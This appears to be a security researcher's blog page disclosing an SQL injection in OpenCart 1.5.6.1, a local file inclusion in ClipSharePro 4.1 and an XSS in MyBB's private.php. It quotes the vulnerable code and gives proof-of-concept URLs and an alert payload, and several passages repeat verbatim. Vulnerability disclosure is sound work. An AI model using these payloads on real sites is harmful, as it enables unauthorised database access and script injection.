Hi , so today we have SQL injection in OpenCart .
I discovered this bug several months ago when i pentested OpenCart and found CSRF in it too.You can check CSRF here.
The ebay.php file in OpenCart is badly coded and you can see a lot SQLi in it.
So here it is..
http://www.exploit-db.com/exploits/32520
http://packetstormsecurity.com/files/125867/OpenCart-1.5.6.1-SQL-Injection.html
http://cxsecurity.com/issue/WLB-2014030212
http://1337day.com/exploit/description/22071
# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection
# Date : 2014/3/26
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Opencart suffers from multipe SQL injection in ebay.php the bug is more about
privilege escalation as attacker may need openbay module access .
Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.
public function getEbayItemId($product_id) {
$this->log('getEbayItemId() - Product ID: '.$product_id);
$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
...
$item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More
public function isEbayOrder($id) {
...
$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");
In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
...
if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
...
$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
#Independent Pakistani Security Researcher
Hi , so today we have SQL injection in OpenCart .
I discovered this bug several months ago when i pentested OpenCart and found CSRF in it too.You can check CSRF here.
The ebay.php file in OpenCart is badly coded and you can see a lot SQLi in it.
So here it is..
I discovered this bug several months ago when i pentested OpenCart and found CSRF in it too.You can check CSRF here.
The ebay.php file in OpenCart is badly coded and you can see a lot SQLi in it.
So here it is..
http://packetstormsecurity.com/files/125867/OpenCart-1.5.6.1-SQL-Injection.html
http://cxsecurity.com/issue/WLB-2014030212
http://1337day.com/exploit/description/22071
# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection
# Date : 2014/3/26
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Opencart suffers from multipe SQL injection in ebay.php the bug is more about
privilege escalation as attacker may need openbay module access .
Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.
public function getEbayItemId($product_id) {
$this->log('getEbayItemId() - Product ID: '.$product_id);
$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
...
$item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More
public function isEbayOrder($id) {
...
$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");
In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
...
if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
...
$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
http://cxsecurity.com/issue/WLB-2014030063
# Exploit Title : ClipSharePro <= 4.1 Local File Inclusion
# Date : 2013/3/9
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.clip-share.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Local File Inclusion
ClipsharePro is a paid youtube clone script , suffers from Localfile Inclusion vulnerability through
which attacker can include arbitrary file in webapp.
LFI in ubr_link_upload.php
Poc code
if($MULTI_CONFIGS_ENABLED){
if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; }
else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); }
}
else{ $config_file = $DEFAULT_CONFIG; }
// Load config file
require $config_file; //including arbitrary file $_GET['config_file']
echo $config_file;
Hi , i didn't update the blog for some time as i was busy with some other stuff but now onward some cool stuff coming soon which i found but didn't publish them..
Mybb XSS , some days back i found a advisory XSS in search.php
Reference : http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day/
After reading the article and little reviewing the code i found same types of function were coded for searching private messages.
So i fuzz the same inputs strings which was used by author in search.php and got private.php also vuln to XSS.
function privatemessage_perform_search_mysql
----in /inc/function_search.php
called in private.php
private.php
POST paramter keywords
Data:<script>alert(/Saadi/)</script>qor'("\2a</script>
P0c
Mybb XSS , some days back i found a advisory XSS in search.php
Reference : http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day/
After reading the article and little reviewing the code i found same types of function were coded for searching private messages.
So i fuzz the same inputs strings which was used by author in search.php and got private.php also vuln to XSS.
function privatemessage_perform_search_mysql
----in /inc/function_search.php
called in private.php
private.php
POST paramter keywords
Data:<script>alert(/Saadi/)</script>qor'("\2a</script>
P0c
Moreover Mybb 1.8 alpha is also vuln on private.php..
So this is for today ;)
#Independent Pakistani Security Researcher
